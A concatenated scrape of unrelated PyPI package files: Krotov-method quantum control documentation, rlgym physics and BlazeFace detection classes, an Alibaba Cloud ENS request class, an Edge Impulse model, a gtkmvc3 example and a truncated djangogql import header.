\langle \chi_k(T) \vert \Delta\phi_k(T) \rangle \right] + \Delta J_T}{
\sum_{k=1}^{N} \Abs{\Delta\phi_k(T)}^2} \,,
cf. :func:`krotov.second_order.numerical_estimate_A`, with
with
.. math:: \Delta J_T \equiv J_T(\{\phi_k^{(i)}(T)\}) -J_T(\{\phi_k^{(i-1)}(T)\})\,.
See the :ref:`/notebooks/07_example_PE.ipynb` for an example.
.. Note::
Even when the second order update equation is mathematically required to
guarantee monotonic convergence, very often an optimization with the
first-order update equation :eq:`krotov_first_order_update` will give
converging results. Since the second order update requires
more numerical resources (calculation and storage of the states
:math:`\ket{\Delta\phi_k(t)}`), you should always try the optimization with
the first-order update equation first.
.. _TimeDiscretization:
Time discretization
-------------------
.. _figkrotovscheme:
.. figure:: krotovscheme.svg
:alt: Sequential update scheme in Krotov’s method on a time grid.
:width: 100%
Sequential update scheme in Krotov’s method on a time grid.
The derivation of Krotov's method assumes time-continuous control
fields. Only in this case, monotonic convergence is mathematically
guaranteed. However, for practical numerical applications, we have to
consider controls on a discrete time grid with :math:`N_T+1` points running
from :math:`t=t_0=0` to :math:`t=t_{N_T}=T`, with a time step :math:`\dd t`. The
states are defined on the points of the time grid, while the controls
are assumed to be constant on the intervals of the time grid.
See the notebook `Time Discretization in Quantum Optimal Control`_
for details.
The discretization yields the numerical scheme shown in
:numref:`figkrotovscheme` for a single control
field (no index :math:`l`), and assuming the first-order update is
sufficient to guarantee monotonic convergence for the chosen functional.
For simplicity, we also assume that the Hamiltonian is linear in the
control, so that :math:`\partial \Op{H} / \partial \epsilon(t)` is not
time-dependent. The scheme proceeds as follows:
#. Construct the states :math:`\{\ket{\chi^{(i-1)}_k(T)}\}` according to
Eq. :eq:`chi_boundary`. For most functionals,
specifically any that are more than linear in the overlaps
:math:`\tau_k` defined in Eq. :eq:`tauk`, the states
:math:`\{\ket{\chi^{(i-1)}_k(T)}\}` depend on the states
:math:`\{\ket{\phi^{(i-1)}_k(T)}\}` forward-propagated under the
optimized pulse from the previous iteration, that is, the guess pulse
in the current iteration.
#. Perform a backward propagation using
Eq. :eq:`bw_eqm` as the equation of motion over the
entire time grid. The resulting state at each point in the time grid
must be stored in memory.
#. Starting from the known initial states
:math:`\{\ket{\phi_k}\} = \{\ket{\phi_k(t=t_0=0)}\}`, calculate the pulse
update for the first time step according to
.. math::
:label: update_discretized0
\Delta\epsilon^{(i)}_1
\equiv \Delta\epsilon^{(i)}(\tilde{t}_0)
= \frac{S(\tilde{t}_0)}{\lambda_{a}} \Im \left[\,
\sum_{k=1}^{N} \bigg\langle \chi_k^{(i-1)}(t_0) \bigg\vert
\frac{\partial \Op{H}}{\partial \epsilon}
\bigg\vert \phi_k(t_0) \bigg\rangle
\right]\,.
The value :math:`\Delta\epsilon^{(i)}_1` is taken on the midpoint of
the first time interval, :math:`\tilde{t}_0 \equiv t_0 + \dd t/2`,
based on the assumption of a piecewise-constant control field and an
equidistant time grid with spacing :math:`\dd t`.
#. Use the updated field :math:`\epsilon^{(i)}_1` for the first interval
to propagate :math:`\ket{\phi_k(t=t_0)}` for a single time step to
:math:`\ket{\phi_k^{(i)}(t=t_0 + \dd t)}`, with
Eq. :eq:`fw_eqm` as the equation of motion. The
updates then proceed sequentially, using the discretized update
equation
.. math::
:label: update_discretized
\Delta\epsilon^{(i)}_{n+1}
\equiv \Delta\epsilon^{(i)}(\tilde{t}_n)
= \frac{S(\tilde{t}_n)}{\lambda_{a}} \Im \left[\,
\sum_{k=1}^{N} \bigg\langle \chi_k^{(i-1)}(t_n) \bigg\vert
\frac{\partial \Op{H}}{\partial \epsilon}
\bigg\vert \phi_k^{(i)}(t_n) \bigg\rangle
\right]
with :math:`\tilde{t}_n \equiv t_n + \dd t / 2` for each time
interval :math:`n`, until the final forward-propagated state
:math:`\ket{\phi^{(i)}_k(T)}` is reached.
#. The updated control field becomes the guess control for the next
iteration of the algorithm, starting again at step 1. The
optimization continues until the value of the functional :math:`J_T`
falls below some predefined threshold, or convergence is reached,
i.e., :math:`\Delta J_T` approaches zero so that no further significant
improvement of :math:`J_T` is to be expected.
Eq. :eq:`krotov_first_order_update`
re-emerges as the continuous limit of the time-discretized update
equation \ :eq:`update_discretized`, i.e.,
:math:`\dd t \rightarrow 0` so that :math:`\tilde{t}_n \rightarrow t_n`.
Note that Eq. :eq:`update_discretized`
resolves the seeming contradiction in the time-continuous
Eq. :eq:`krotov_first_order_update`
that the calculation of :math:`\epsilon^{(i)}(t)` requires knowledge of
the states :math:`\ket{\phi_k^{(i)}(t)}` which would have to be obtained
from a propagation under :math:`\epsilon^{(i)}(t)`. By having the time
argument :math:`\tilde{t}_n` on the left-hand-side of
Eq. :eq:`update_discretized`, and
:math:`t_n < \tilde{t}_n` on the right-hand-side (with
:math:`S(\tilde{t}_n)` known at all times), the update for each interval
only depends on "past" information.
For multiple objectives, the scheme can run in parallel, and each objective
contributes a term to the update. Summation of these terms yields the sum
in Eq. :eq:`krotov_first_order_update`. See :mod:`krotov.parallelization` for
details. For a second-order update, the forward propagated states from step 4,
both for the current iteration and the previous iteration, must be stored in
memory over the entire time grid.
.. _Time Discretization in Quantum Optimal Control: https://nbviewer.jupyter.org/gist/goerz/21e46ea7b45c9514e460007de14419bd/Krotov_time_discretization.ipynb#
Pseudocode
----------
A complete pseudocode for Krotov's method as described in the previous section
:ref:`TimeDiscretization` is available in PDF format: `krotov_pseudocode.pdf`_.
.. _krotov_pseudocode.pdf: krotov_pseudocode.pdf
.. _ChoiceOfLambdaA:
Choice of λₐ
------------
The monotonic convergence of Krotov's method is only guaranteed in the
continuous limit; a coarse
time step must be compensated by larger values of the inverse step size
:math:`\lambda_{a,l}`, slowing down convergence. Values that are too
small will cause sharp spikes in the optimized control and numerical
instabilities. A lower limit for :math:`\lambda_{a,l}` can be determined
from the requirement that the change :math:`\Delta\epsilon_l^{(i)}(t)`
should be at most of the same order of magnitude as the guess pulse
:math:`\epsilon_l^{(i-1)}(t)` for that iteration. The Cauchy-Schwarz
inequality applied to the update
equation \ :eq:`krotov_first_order_update`
yields
.. math::
\Norm{\Delta \epsilon_l(t)}_{\infty}
\le
\frac{\Norm{S(t)}}{\lambda_{a,l}}
\sum_{k} \Norm{\ket{\chi_k (t)}}_{\infty} \Norm{\ket{\phi_k (t)}}_{\infty}
\Norm{\frac{\partial \Op{H}}{\partial \epsilon_l(t)}}_{\infty}
\stackrel{!}{\le}
\Norm{\epsilon_l^{(i)}(t)}_{\infty}\,,
where :math:`\norm{\partial \Op{H}/\partial \epsilon_l(t)}_{\infty}` denotes the
supremum norm of the operator :math:`\partial \Op{H}/\partial \epsilon_l`
obtained at time :math:`t`. Since :math:`S(t) \in [0,1]` and
:math:`\ket{\phi_k}` are normalized, the condition for :math:`\lambda_{a,l}` becomes
.. math::
\lambda_{a,l} \ge
\frac{1}{\Norm{\epsilon_l^{(i)}(t)}_{\infty}}
\left[ \sum_{k} \Norm{\ket{\chi_k(t)}}_{\infty} \right]
\Norm{\frac{\partial \Op{H}}{\partial \epsilon_l(t)}}_{\infty}\,.
From a practical point of view, the best strategy is to start the
optimization with a comparatively large value of :math:`\lambda_{a,l}`,
and after a few iterations lower :math:`\lambda_{a,l}` as far as
possible without introducing numerical instabilities. In principle, the value
of :math:`\lambda_{a,l}` may be adjusted dynamically with respect to the
rate of convergence, via the `modify_params_after_iter` argument to
:func:`.optimize_pulses`. Generally, the ideal choice of
:math:`\lambda_{a,l}` requires some trial and error, but once a suitable value
has been found, it does not have to be adjusted further. In particular, it is
not necessary to perform a line search over :math:`\lambda_{a,l}`.
Complex controls and the RWA
----------------------------
When using the rotating wave approximation (RWA), it is important to remember
that the target states are usually defined in the lab frame, not in the
rotating frame. This is relevant for the construction of
:math:`\ket{\chi_k(T)}`. When doing a simple optimization, such as a
state-to-state or a gate optimization, the easiest approach is to transform
the target states to the rotating frame before calculating
:math:`\ket{\chi_k(T)}`. This is both straightforward and numerically
efficient.
Another solution would be to transform the result of the forward propagation
:math:`\ket{\phi_k(T)}` from the rotating frame to the lab frame, then
constructing :math:`\ket{\chi_k(T)}`, and finally to transform
:math:`\ket{\chi_k(T)}` back to the rotating frame, before starting the
backward propagation.
When the RWA is used, the control fields are
complex-valued. In this case the Krotov update equation is valid for
both the real and the imaginary part independently. The most straightforward
implementation of the method is for real controls only, requiring that any
complex control Hamiltonian is rewritten as two independent control
Hamiltonians, one for the real part and one for the imaginary part of the
control field. For example,
.. math::
\epsilon^*(t) \Op{a} + \epsilon(t) \Op{a}^\dagger
= \epsilon_{\text{re}}(t) (\Op{a} + \Op{a}^\dagger) + \epsilon_{\text{im}}(t) (i \Op{a}^\dagger - i \Op{a})
with two independent control fields :math:`\epsilon_{\text{re}}(t)= \Re[\epsilon(t)]` and
:math:`\epsilon_{\text{im}}(t) = \Im[\epsilon(t)]`.
See the :ref:`/notebooks/02_example_lambda_system_rwa_complex_pulse.ipynb` for an
example.
Optimization in Liouville space
-------------------------------
The coupled equations :eq:`krotov_first_order_update`–:eq:`bw_eqm` can be
generalized to open system dynamics by replacing Hilbert space states with
density matrices, :math:`\Op{H}` with :math:`\mathrm{i} \Liouville`, and brakets (inner products) with Hilbert-Schmidt products,
:math:`\langle \cdot \vert \cdot \rangle \rightarrow \langle\!\langle \cdot
\vert \cdot \rangle\!\rangle`. In full generality, :math:`\Op{H}` in
Eq. :eq:`krotov_first_order_update` is the operator :math:`H` on the right-hand
side of whatever the equation of motion for the forward propagation of the
states is, written in the form :math:`\mathrm{i} \hbar \dot\phi = H \phi`,
cf. Eq. :eq:`fw_eqm`. See :mod:`krotov.mu` for details.
Note also that the backward propagation Eq. :eq:`bw_eqm`
uses the adjoint :math:`H`, which is relevant both for a dissipative
Liouvillian :cite:`BartanaJCP93,OhtsukiJCP99,GoerzNJP2014` and a non-Hermitian
Hamiltonian :cite:`MullerQIP11,GoerzQST2018`.
See the :ref:`/notebooks/04_example_dissipative_qubit_reset.ipynb` for an example.
|
PypiClean
|
/EARL-pytorch-0.5.1.tar.gz/EARL-pytorch-0.5.1/rlgym/utils/gamestates/physics_object.py
|
from rlgym.utils import math
import numpy as np
from typing import Optional
class PhysicsObject(object):
def __init__(self, position=None, quaternion=None, linear_velocity=None, angular_velocity=None):
self.position: np.ndarray = position if position is not None else np.zeros(3)
# ones by default to prevent mathematical errors when converting quat to rot matrix on empty physics state
self.quaternion: np.ndarray = quaternion if quaternion is not None else np.ones(4)
self.linear_velocity: np.ndarray = linear_velocity if linear_velocity is not None else np.zeros(3)
self.angular_velocity: np.ndarray = angular_velocity if angular_velocity is not None else np.zeros(3)
self._euler_angles: Optional[np.ndarray] = np.zeros(3)
self._rotation_mtx: Optional[np.ndarray] = np.zeros((3,3))
self._has_computed_rot_mtx = False
self._has_computed_euler_angles = False
def decode_car_data(self, car_data: np.ndarray):
"""
Function to decode the physics state of a car from the game state array.
:param car_data: Slice of game state array containing the car data to decode.
"""
self.position = car_data[:3]
self.quaternion = car_data[3:7]
self.linear_velocity = car_data[7:10]
self.angular_velocity = car_data[10:]
def decode_ball_data(self, ball_data: np.ndarray):
"""
Function to decode the physics state of the ball from the game state array.
:param ball_data: Slice of game state array containing the ball data to decode.
"""
self.position = ball_data[:3]
self.linear_velocity = ball_data[3:6]
self.angular_velocity = ball_data[6:9]
def forward(self) -> np.ndarray:
return self.rotation_mtx()[:, 0]
def right(self) -> np.ndarray:
return self.rotation_mtx()[:, 1]
def left(self) -> np.ndarray:
return self.rotation_mtx()[:, 1] * -1
def up(self) -> np.ndarray:
return self.rotation_mtx()[:, 2]
def pitch(self) -> float:
return self.euler_angles()[0]
def yaw(self) -> float:
return self.euler_angles()[1]
def roll(self) -> float:
return self.euler_angles()[2]
# pitch, yaw, roll
def euler_angles(self) -> np.ndarray:
if not self._has_computed_euler_angles:
self._euler_angles = math.quat_to_euler(self.quaternion)
self._has_computed_euler_angles = True
return self._euler_angles
def rotation_mtx(self) -> np.ndarray:
if not self._has_computed_rot_mtx:
self._rotation_mtx = math.quat_to_rot_mtx(self.quaternion)
self._has_computed_rot_mtx = True
return self._rotation_mtx
def serialize(self):
"""
Function to serialize all the values contained by this physics object into a single 1D list. This can be useful
when constructing observations for a policy.
:return: List containing the serialized data.
"""
repr = []
if self.position is not None:
for arg in self.position:
repr.append(arg)
if self.quaternion is not None:
for arg in self.quaternion:
repr.append(arg)
if self.linear_velocity is not None:
for arg in self.linear_velocity:
repr.append(arg)
if self.angular_velocity is not None:
for arg in self.angular_velocity:
repr.append(arg)
if self._euler_angles is not None:
for arg in self._euler_angles:
repr.append(arg)
if self._rotation_mtx is not None:
for arg in self._rotation_mtx.ravel():
repr.append(arg)
return repr
|
PypiClean
|
/nsface_python-1.1.78-py3-none-any.whl/nsface/model_zoo/model_detection/blazeface.py
|
import os
import numpy as np
import skimage.transform
import os
import os.path as osp
import cv2
import time
import torch
from ...utils.util_detection import tensors_to_detections_np,weighted_non_max_suppression_np
from ..model_common import load_tensorRT, load_onnx, load_openvino,load_torch, load_tensorRT_multiple
from ...data.image import read_torchImage,resize_image_multi,resize_image
class BlazeFace:
def __init__(self, model_type,model_path,isfront=False,**kwargs):
self.model_path = model_path
self.model_type=model_type
self.isfront = isfront
self.min_suppression_threshold = kwargs.get("iou_thresh",0.3)
self.min_suppression_threshold = kwargs.get("nms_thresh",0.3)
if model_type in ['vino','openvino']:
self.model_base = os.path.join("/",*model_path[0].split("/")[:-1])
self.model_name = model_path[0].split("/")[-1]
else:
self.model_base = os.path.join("/",*model_path.split("/")[:-1])
self.model_name = model_path.split("/")[-1]
if self.isfront:
self.anchors_name = kwargs.get("anchors_name","blazeface_front_anchors.npy")
self.anchors_path = os.path.join(self.model_base,self.anchors_name)
else:
self.anchors_name = kwargs.get("anchors_name","blazeface_back_anchors.npy")
self.anchors_path = os.path.join(self.model_base,self.anchors_name)
if self.model_type in ['pt','pth']:
if self.isfront:
self.net = load_torch.TorchModel('blazeface_front',self.model_path)
else:
self.net = load_torch.TorchModel('blazeface_back',self.model_path)
elif self.model_type=='onnx':
self.net = load_onnx.Onnx_session(self.model_path,input_mean=0.0, input_std=1.0,output_sort=True,onnx_device=kwargs.get("onnx_device",'cuda'))
elif self.model_type=='trt':
self.net = load_tensorRT.TrtModel(self.model_path,torch_image=True,not_norm=True)
elif self.model_type=='openvino':
self.net = load_openvino.Openvino(self.model_path,not_norm=True,torch_image=True,device=kwargs.get("device",'CPU'))
self._init_vars()
def _init_vars(self):
self.num_anchors=896
self.num_coords=16
self.num_classes=1
self.score_clipping_thresh = 100.0
if self.isfront:
#self.min_score_thresh = 0.75
self.x_scale = 128.0
self.y_scale = 128.0
self.h_scale = 128.0
self.w_scale = 128.0
else:
#self.min_score_thresh = 0.65
self.x_scale = 256.0
self.y_scale = 256.0
self.h_scale = 256.0
self.w_scale = 256.0
self.anchors = np.array(np.load(self.anchors_path),dtype=np.float32)
def forward(self,img,thresh,input_size):
net_out_start=time.time()
outs = self.net(img)
net_out_end=time.time()
if self.model_type=='trt':
for oi,o in enumerate(outs):
if oi==0:
outs[oi] = np.reshape(outs[oi].ravel(),(-1,self.num_anchors,self.num_classes))
else:
outs[oi] = np.reshape(outs[oi].ravel(),(-1,self.num_anchors,self.num_coords))
# post processing
detections = tensors_to_detections_np(outs[1],outs[0],self.anchors,self.num_anchors,self.num_coords,self.num_classes,self.score_clipping_thresh,thresh, \
self.x_scale,self.y_scale,self.w_scale,self.h_scale)
filtered_detections = []
for i in range(len(detections)):
faces = weighted_non_max_suppression_np(detections[i],self.min_suppression_threshold)
faces = np.stack(faces) if len(faces) > 0 else np.zeros((0, 17))
filtered_detections.append(faces)
net_out_time = (net_out_end-net_out_start)*1000
return filtered_detections, net_out_time
def detect(self,img,thresh=0.65,input_size = None,resize_method='pad'):
if not input_size:
if self.isfront:
input_size=[128,128]
else:
input_size=[256,256]
if resize_method=='pad':
rescale_start = time.time()
det_scale = 1.0
det_img = np.zeros((input_size[1], input_size[0], 3), dtype=np.uint8 )
pos_y=0
pos_x=0
if img.shape[0] < input_size[0] and img.shape[1] < input_size[1]:
pos_y=(input_size[0]-img.shape[0])//2
pos_x=(input_size[1]-img.shape[1])//2
det_img[pos_y:pos_y+img.shape[0], pos_x:pos_x+img.shape[1], :] = img
elif img.shape[0]==img.shape[1] and img.shape[0]>input_size[0]:
resize = input_size[0]//4*3
det_scale = float(resize) / img.shape[0]
img = cv2.resize(img, (resize,resize))
pos_y=(input_size[0]-img.shape[0])//2
pos_x=(input_size[1]-img.shape[1])//2
det_img[pos_y:pos_y+img.shape[0], pos_x:pos_x+img.shape[1], :] = img
else:
im_ratio = float(img.shape[0]) / img.shape[1]
model_ratio = float(input_size[1]) / input_size[0]
if im_ratio>model_ratio:
new_height = input_size[1]
pos_y = 0
new_width = int(new_height / im_ratio)
pos_x = (input_size[0]-new_width)//2
else:
new_width = input_size[0]
pos_x = 0
new_height = int(new_width * im_ratio)
pos_y = (input_size[1]-new_height)//2
det_scale = float(new_height) / img.shape[0]
resized_img = cv2.resize(img, (new_width, new_height))
det_img[pos_y:pos_y+new_height, pos_x:pos_x+new_width, :] = resized_img
else:
rescale_start = time.time()
det_img = resize_image(img,(input_size[1],input_size[0]))
meta = {'original_shape':img.shape, 'resized_shape':det_img.shape}
scale_x = meta['resized_shape'][1] / meta['original_shape'][1]
scale_y = meta['resized_shape'][0] / meta['original_shape'][0]
self.det_shape = det_img.shape
self.det_img = det_img
# norm
det_img = np.float32(det_img)
det_img = (det_img / 127.5 ) - 1.0
rescale_end = time.time()
if not self.model_type=='onnx':
det_img = det_img.transpose(2, 0, 1)
det_img = torch.from_numpy(det_img).unsqueeze(0)
forward_start = time.time()
outs = self.forward(det_img,thresh,input_size)
forward_end = time.time()
if not outs:
return None
filtered_detections, net_out_time = outs
post1_start = time.time()
bboxs=[]
keypoints=[]
scores=[]
for final in filtered_detections:
for d in final:
bbox = np.array([d[1],d[0],d[3],d[2]])
bboxs.append(bbox)
scores.append(d[16])
eye_right = [d[4],d[5]]
eye_left = [d[6],d[7]]
nose = [d[8],d[9]]
mouth = [d[10],d[11]]
ear_right = [d[12],d[13]]
ear_left = [d[14],d[15]]
keypoints.append([eye_right, eye_left, nose,mouth, ear_right, ear_left])
post1_end = time.time()
rescale_time = (rescale_end-rescale_start)*1000
forward_time = (forward_end-forward_start)*1000
post1_time = (post1_end-post1_start)*1000
time_dict={'rescale':rescale_time,"forward":forward_time,'post1':post1_time,'net_out':net_out_time}
if resize_method=='resize':
return np.array(bboxs), np.array(keypoints),np.array(scores), scale_x, scale_y,input_size,time_dict
else:
return np.array(bboxs), np.array(keypoints),np.array(scores), det_img, [pos_x, pos_y], det_scale,input_size,time_dict
|
PypiClean
|
/aliyun-python-sdk-ens-3.0.13.tar.gz/aliyun-python-sdk-ens-3.0.13/aliyunsdkens/request/v20171110/RunInstancesRequest.py
|
from aliyunsdkcore.request import RpcRequest
import json
class RunInstancesRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Ens', '2017-11-10', 'RunInstances','ens')
self.set_method('POST')
def get_ScheduleAreaLevel(self): # String
return self.get_query_params().get('ScheduleAreaLevel')
def set_ScheduleAreaLevel(self, ScheduleAreaLevel): # String
self.add_query_param('ScheduleAreaLevel', ScheduleAreaLevel)
def get_UniqueSuffix(self): # Boolean
return self.get_query_params().get('UniqueSuffix')
def set_UniqueSuffix(self, UniqueSuffix): # Boolean
self.add_query_param('UniqueSuffix', UniqueSuffix)
def get_InstanceChargeStrategy(self): # String
return self.get_query_params().get('InstanceChargeStrategy')
def set_InstanceChargeStrategy(self, InstanceChargeStrategy): # String
self.add_query_param('InstanceChargeStrategy', InstanceChargeStrategy)
def get_SecurityId(self): # String
return self.get_query_params().get('SecurityId')
def set_SecurityId(self, SecurityId): # String
self.add_query_param('SecurityId', SecurityId)
def get_KeyPairName(self): # String
return self.get_query_params().get('KeyPairName')
def set_KeyPairName(self, KeyPairName): # String
self.add_query_param('KeyPairName', KeyPairName)
def get_Password(self): # String
return self.get_query_params().get('Password')
def set_Password(self, Password): # String
self.add_query_param('Password', Password)
def get_HostName(self): # String
return self.get_query_params().get('HostName')
def set_HostName(self, HostName): # String
self.add_query_param('HostName', HostName)
def get_SystemDisk(self): # Struct
return self.get_query_params().get('SystemDisk')
def set_SystemDisk(self, SystemDisk): # Struct
self.add_query_param("SystemDisk", json.dumps(SystemDisk))
def get_NetDistrictCode(self): # String
return self.get_query_params().get('NetDistrictCode')
def set_NetDistrictCode(self, NetDistrictCode): # String
self.add_query_param('NetDistrictCode', NetDistrictCode)
def get_EnsRegionId(self): # String
return self.get_query_params().get('EnsRegionId')
def set_EnsRegionId(self, EnsRegionId): # String
self.add_query_param('EnsRegionId', EnsRegionId)
def get_Period(self): # Long
return self.get_query_params().get('Period')
def set_Period(self, Period): # Long
self.add_query_param('Period', Period)
def get_PublicIpIdentification(self): # Boolean
return self.get_query_params().get('PublicIpIdentification')
def set_PublicIpIdentification(self, PublicIpIdentification): # Boolean
self.add_query_param('PublicIpIdentification', PublicIpIdentification)
def get_VSwitchId(self): # String
return self.get_query_params().get('VSwitchId')
def set_VSwitchId(self, VSwitchId): # String
self.add_query_param('VSwitchId', VSwitchId)
def get_PrivateIpAddress(self): # String
return self.get_query_params().get('PrivateIpAddress')
def set_PrivateIpAddress(self, PrivateIpAddress): # String
self.add_query_param('PrivateIpAddress', PrivateIpAddress)
def get_PeriodUnit(self): # String
return self.get_query_params().get('PeriodUnit')
def set_PeriodUnit(self, PeriodUnit): # String
self.add_query_param('PeriodUnit', PeriodUnit)
def get_InstanceName(self): # String
return self.get_query_params().get('InstanceName')
def set_InstanceName(self, InstanceName): # String
self.add_query_param('InstanceName', InstanceName)
def get_AutoRenew(self): # Boolean
return self.get_query_params().get('AutoRenew')
def set_AutoRenew(self, AutoRenew): # Boolean
self.add_query_param('AutoRenew', AutoRenew)
def get_InternetChargeType(self): # String
return self.get_query_params().get('InternetChargeType')
def set_InternetChargeType(self, InternetChargeType): # String
self.add_query_param('InternetChargeType', InternetChargeType)
def get_NetWorkId(self): # String
return self.get_query_params().get('NetWorkId')
def set_NetWorkId(self, NetWorkId): # String
self.add_query_param('NetWorkId', NetWorkId)
def get_SchedulingPriceStrategy(self): # String
return self.get_query_params().get('SchedulingPriceStrategy')
def set_SchedulingPriceStrategy(self, SchedulingPriceStrategy): # String
self.add_query_param('SchedulingPriceStrategy', SchedulingPriceStrategy)
def get_ImageId(self): # String
return self.get_query_params().get('ImageId')
def set_ImageId(self, ImageId): # String
self.add_query_param('ImageId', ImageId)
def get_InternetMaxBandwidthOut(self): # Long
return self.get_query_params().get('InternetMaxBandwidthOut')
def set_InternetMaxBandwidthOut(self, InternetMaxBandwidthOut): # Long
self.add_query_param('InternetMaxBandwidthOut', InternetMaxBandwidthOut)
def get_UserData(self): # String
return self.get_query_params().get('UserData')
def set_UserData(self, UserData): # String
self.add_query_param('UserData', UserData)
def get_PasswordInherit(self): # Boolean
return self.get_query_params().get('PasswordInherit')
def set_PasswordInherit(self, PasswordInherit): # Boolean
self.add_query_param('PasswordInherit', PasswordInherit)
def get_InstanceType(self): # String
return self.get_query_params().get('InstanceType')
def set_InstanceType(self, InstanceType): # String
self.add_query_param('InstanceType', InstanceType)
def get_InstanceChargeType(self): # String
return self.get_query_params().get('InstanceChargeType')
def set_InstanceChargeType(self, InstanceChargeType): # String
self.add_query_param('InstanceChargeType', InstanceChargeType)
def get_Amount(self): # Long
return self.get_query_params().get('Amount')
def set_Amount(self, Amount): # Long
self.add_query_param('Amount', Amount)
def get_DataDisk(self): # Array
return self.get_query_params().get('DataDisk')
def set_DataDisk(self, DataDisk): # Array
self.add_query_param("DataDisk", json.dumps(DataDisk))
def get_SchedulingStrategy(self): # String
return self.get_query_params().get('SchedulingStrategy')
def set_SchedulingStrategy(self, SchedulingStrategy): # String
self.add_query_param('SchedulingStrategy', SchedulingStrategy)
def get_Carrier(self): # String
return self.get_query_params().get('Carrier')
def set_Carrier(self, Carrier): # String
self.add_query_param('Carrier', Carrier)
|
PypiClean
|
/take-icusecases-0.0.3.tar.gz/take-icusecases-0.0.3/takeusecases/ml/data_source/database.py
|
import json
import pandas as pd
# from ml.data_source.base import DataSource
from SentenceTokenizer import SentenceTokenizer
from takeusecases.ml.data_source.base import DataSource
class DataBase(DataSource):
def __init__(self):
"""
Constructor.
Parameters
-----------
arg : type
description
Returns
-------
class Object
"""
pass
def get_data(self)->pd.DataFrame:
"""
Returns a flat table in Dataframe
Parameters
-----------
arg : type
description
Returns
-------
pd.DataFrame
Dataframe with data
"""
pass
def open_connection(self, connection):
"""
Opens the connection to the database
Parameters
-----------
connection : string
Connection with database
Returns
-------
bool
Check if connection is open or not
"""
pass
def close_connection(self, connection ):
"""
Close the connection database
Parameters
-----------
connection : string
Connection with database
Returns
-------
bool
Check if connection was closed
"""
pass
def clean_owner_caller(self, df):
df = df[df['msgs'].notnull()]
df = df[df['msgs']>0]
# Altered by Ramon due to new usage in production
# df.columns = ['Caller', 'Json', 'msgs']
assert 'Caller' in df.columns
assert 'Json' in df.columns
assert 'msgs' in df.columns
messages = []
for index, row in df.iterrows():
if isinstance(row['Json'], float)==False:
info = json.loads(row['Json'])
for i in info['states']:
if 'inputActions' in i:
for j in i['inputActions']:
if 'type' in j['settings'] and 'content' in j['settings']:
if j['settings']['type'] == 'text/plain':
messages.append([row['Caller'], 'Input', j['settings']['content']])
if 'outputActions' in i:
for j in i['outputActions']:
if 'type' in j['settings'] and 'content' in j['settings']:
if j['settings']['type'] == 'text/plain':
messages.append([row['Caller'], 'Output', j['settings']['content']])
df_mes = pd.DataFrame(messages, columns=['BotId', 'Type', 'Message'])
df_mes = df_mes[df_mes['Message'].notnull()]
tokenizer = SentenceTokenizer()
df_mes['Message'] = df_mes.Message.apply(lambda x: tokenizer.process_message(x))
df_mes = df_mes[df_mes['Message'].notnull()]
df_messages = df_mes[['BotId']].drop_duplicates()
df_messages['Message'] = df_mes.groupby(['BotId'])['Message'].transform(lambda x: '. '.join(x))
return df_messages
|
PypiClean
|
/edgeimpulse_api-1.29.20.tar.gz/edgeimpulse_api-1.29.20/edgeimpulse_api/models/tuner_create_trial_impulse.py
|
from __future__ import annotations
from inspect import getfullargspec
import pprint
import re # noqa: F401
import json
from typing import Any, Dict, List, Optional
from pydantic import BaseModel, Field, StrictStr
class TunerCreateTrialImpulse(BaseModel):
id: Optional[StrictStr] = None
experiment: Optional[StrictStr] = None
original_trial_id: Optional[StrictStr] = None
input_blocks: Optional[List[Dict[str, Any]]] = Field(None, alias="inputBlocks")
dsp_blocks: Optional[List[Dict[str, Any]]] = Field(None, alias="dspBlocks")
learn_blocks: Optional[List[Dict[str, Any]]] = Field(None, alias="learnBlocks")
__properties = ["id", "experiment", "original_trial_id", "inputBlocks", "dspBlocks", "learnBlocks"]
class Config:
allow_population_by_field_name = True
validate_assignment = False
def to_str(self) -> str:
"""Returns the string representation of the model using alias"""
return pprint.pformat(self.dict(by_alias=True))
def to_json(self) -> str:
"""Returns the JSON representation of the model using alias"""
return json.dumps(self.to_dict())
@classmethod
def from_json(cls, json_str: str) -> TunerCreateTrialImpulse:
"""Create an instance of TunerCreateTrialImpulse from a JSON string"""
return cls.from_dict(json.loads(json_str))
def to_dict(self):
"""Returns the dictionary representation of the model using alias"""
_dict = self.dict(by_alias=True,
exclude={
},
exclude_none=True)
return _dict
@classmethod
def from_dict(cls, obj: dict) -> TunerCreateTrialImpulse:
"""Create an instance of TunerCreateTrialImpulse from a dict"""
if obj is None:
return None
if type(obj) is not dict:
return TunerCreateTrialImpulse.construct(**obj)
_obj = TunerCreateTrialImpulse.construct(**{
"id": obj.get("id"),
"experiment": obj.get("experiment"),
"original_trial_id": obj.get("original_trial_id"),
"input_blocks": obj.get("inputBlocks"),
"dsp_blocks": obj.get("dspBlocks"),
"learn_blocks": obj.get("learnBlocks")
})
return _obj
|
PypiClean
|
/python-gtkmvc3-dlr-1.0.1.tar.gz/python-gtkmvc3-dlr-1.0.1/examples/adapters/user_class.py
|
import _importer
from gtkmvc3 import Model, Controller, View, Observable
from gtkmvc3.adapters import UserClassAdapter
import gtk
# This example makes use of a user-defined class that contains a
# setter and a getter for an internal variable. When the class is
# instantiated, a maximum value is specified. That limit represents
# the maximum value that the internal variable can be set at.
#
# The controller declares an adapter that adapts a text entry and
# the user-class instance. As the user class raises a ValueError
# exception when trying setting a bad value, the adapter is
# requested to handle error conditions through value_error
# parameter. Try to set a value greater than 10 by editing the text
# entry.
class UserClass (Observable):
def __init__(self, max_val):
Observable.__init__(self)
self.__x = 0
self.max_val = max_val
return
@Observable.observed
def set_x(self, v):
if v > self.max_val:
raise ValueError("x cannot be greater than %d" % self.max_val)
self.__x=v
return
def get_x(self): return self.__x
pass
class MyView (View):
glade = "adapters.glade"
top = "window2"
pass
class MyModel (Model):
xx = UserClass(10)
__observables__ = ("xx",)
pass
class MyCtrl (Controller):
def register_adapters(self):
a = UserClassAdapter(self.model, "xx", "get_x", "set_x",
value_error=myerr)
a.connect_widget(self.view["en2"])
self.adapt(a)
return
def on_button2_clicked(self, button):
self.model.xx.set_x(self.model.xx.get_x() + 1)
return
def on_window2_delete_event(self, w, e):
gtk.main_quit()
return True
pass
# ----------------------------------------------------------------------
def myerr(adapt, name, val):
print "Error from", adapt, ":", name, ",", val
adapt.update_widget()
return
m = MyModel()
v = MyView()
c = MyCtrl(m, v)
m.xx.set_x(5)
gtk.main()
|
PypiClean
|
/python-djangogql-0.1.0.tar.gz/python-djangogql-0.1.0/djangogql/core/types/filter_input.py
|
import itertools
import graphene
from django.db import models
